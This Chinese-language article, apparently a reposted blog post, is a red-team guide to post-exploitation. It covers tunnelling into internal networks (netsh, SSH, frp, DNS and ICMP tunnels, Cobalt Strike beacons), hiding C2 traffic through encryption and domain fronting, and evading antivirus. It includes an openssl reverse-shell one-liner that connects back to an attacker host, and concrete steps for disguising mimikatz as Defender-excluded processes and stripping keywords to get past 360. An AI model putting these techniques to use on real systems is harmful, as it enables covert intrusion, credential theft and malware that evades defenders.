【网络安全】​红队攻击后渗透

简介

在hvv和其他攻防中，找到和利用漏洞只是开端，通过C2获取更高权限才是最终要义。本篇文章我们将从三个方面讲后渗透：1、使用隧道隐藏自己；2、C2流量加密；3、木马免杀。

一、使用隧道

netsh端口映射

在我们漫游内网的时候，经常会碰到内网机器互通，我们外网的机器却只能访问单个内网机器。这时一个简单的Windows自带的端口转发工具就可以让我们遨游内网：

netsh interface portproxy

netsh端口转发监听metperter

当kali的msf无法正向连接后门的时候，可以生成一个反向后门连接到某服务器，再在此服务器上通过端口映射访问/转发给kali的msf

cobalt strike多层内网上线

CS是APT攻击神器，类似的还有已停止维护的RcRat等C2工具。正向连接不多赘述，无非就是生成listener之后连接后门。

多层内网上线多处在同网段有多个服务器。如果此网段没有局域网防火墙，直接正向连接：可以生成一个TCP的beacon的listener，再生成一个SSL的exe，绑定端口即可。

多层内网如果有防火墙，可选用beacon_reverse_tcp作为listener的payload，绑定host和port。这样服务器1执行后门后，此服务器会自动连接同网段服务器2 。

通过端口映射内网抓包

本机A，远程B，目标C。在B上通过netsh之类的端口映射工具映射C，7777映射端口80。就可以通过A访问B的7777，获取C的80内容，此刻即可用BurpSuite抓包。

设置上游代理访问内网

通过msf拿到服务器权限后，往往开代理进入到内网横向渗透。此时可再开一台虚拟机，设置bp的上游代理为系统代理，再通过代理访问kali，再经过目标服务器访问内网。好处是足够安全，坏处是响应速度较慢。

需要用SocksCap设置socks代理；在bp上的user_options编辑upstream proxy rule。

使用Metasploit Portfwd进行端口转发和重定向

portfwd转发tcp连接。

内网穿透

reGeorg：基于socks5的内网穿透工具，会被杀掉。bypass可以用Neo-reGeorg。

SSH隧道转发

隧道（tunneling）可将其他TCP端口的数据通过SSH转发，并提供相应加解密服务。好处：加密通信数据、突破防火墙限制，如：

ssh -qTfnN -D 7070 [email protected]

转发MySQL端口：

ssh -L 3306:localhost:3306 [email protected] -fN

远程转发突破内网：

ssh -R 8877:10.10.10.157:80 [email protected]

使用EarthWorm做socks5代理完成内网穿透

已停止更新，不推荐。简单高效的proxychains4更合适。

Tunna搭建HTTP正向代理

封装和简化流量，用来突破防火墙

python proxy.py -u -l [options]

通过ICMP封装穿透防火墙

如果可以ping通，可以使用icmptunnel把IP流量封装进ping数据包中。

DNS隧道穿透

最早接触的时候是CS刚开始发布。作为一种隐蔽信道，将其他协议封装在DNS协议中。因为大部分防火墙和IDS很少过滤DNS流量，这种方法很高效。

工具：DNS2tcp或CS。

frp内网穿透

作为最经典的内网穿透，它是一个高性能的反向代理，支持全平台。

二、流量加密

在横向渗透时往往需要反弹shell，如果shell是明文传输很容易被IDS或安全软件分析检测流量特征，从而功亏一篑。

openssl本机流量加密

在 kali 上使用 OpenSSL 生成自签名证书

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

在 kali 上监听端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8080

在目标上执行反弹 shell 命令

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect

10.10.10.129:8080 > /tmp/s; rm /tmp/s

MSF流量加密

标准做法：openssl创建证书、生成后门带ssl参数、设置监听器，从而生成一个加密的Meter Meter。

域前置

济南的hackingClub大会议题讲到了这个。通过CDN节点将流量转发到真实的的C2服务器，其中CDN节点ip通过识别请求的HOST头进行流量转发，配合一个高可信度的子域名即可躲避DLP、agent等流量检测。

Cobalt Strike域前置

配置https://github.com/xx0hcd/Malleable-C2-Profiles

修改C2的profile中的host头，运行teamserver的时候加上配置文件的参数：

nohup ./teamserver [ip]

输入密码查看隐藏内容

c2.profile

生成的powershell等后门代码不可放c2本机

Cobalt Strike生成证书修改C2 profile

CS默认使用的证书很容易被检测，我们需要重新生成证书，然后创建并修改C2profile文件，其中配置好code-signer，里面有keystore、password、alias等。然后验证是否可用：

./c2lint c2.profile

三、木马免杀

Windows Defender

在win2016/2019里面，Defender不会查杀这些文件名所在的进程：

Process exclusions

%SystemRoot%system32inetsrvw3wp.exe

%SystemRoot%SysWOW64inetsrvw3wp.exe

%SystemDrive%PHP5433php-cgi.exe

通过静态免杀后的mimikatz把木马修改为以上文件名即可。

360

使用mimi，在vs2012的平台工作集下编译，发现会被查杀。用VS修改源码，把所有的mimikatz关键词修改为其他字符即可。

使用printSpoofer，vs2019选择x64编译，把cpp输出帮助文档全部删除。关键词PrintSpoofer替换为其他关键词，再加一个icon即可。

MSF使用分离加载器免杀360 。

64位免杀编译。Dev-Cpp编译orwelldevcpp。

python3 的shellcode分离免杀。

Golang加载器的shellcode。这种bypass在GitHub有很多，每天都有更新。

C#异或免杀。这个用的比较多，因为文件小便于传输。

掩日。已不再更新，可参考代码。

msf加密壳。如darkarmour

Invoke-PSImage可以把一个powershell脚本字节嵌入PNG图片，并生成一个shell。然后使用CS连接。

MSF通过payload和编码器生成后门前进行编码转换；使用Cooolis-server回连Metasploit RPC服务器。

原文始发于微信公众号（513 Sec）：【网络安全】​红队攻击后渗透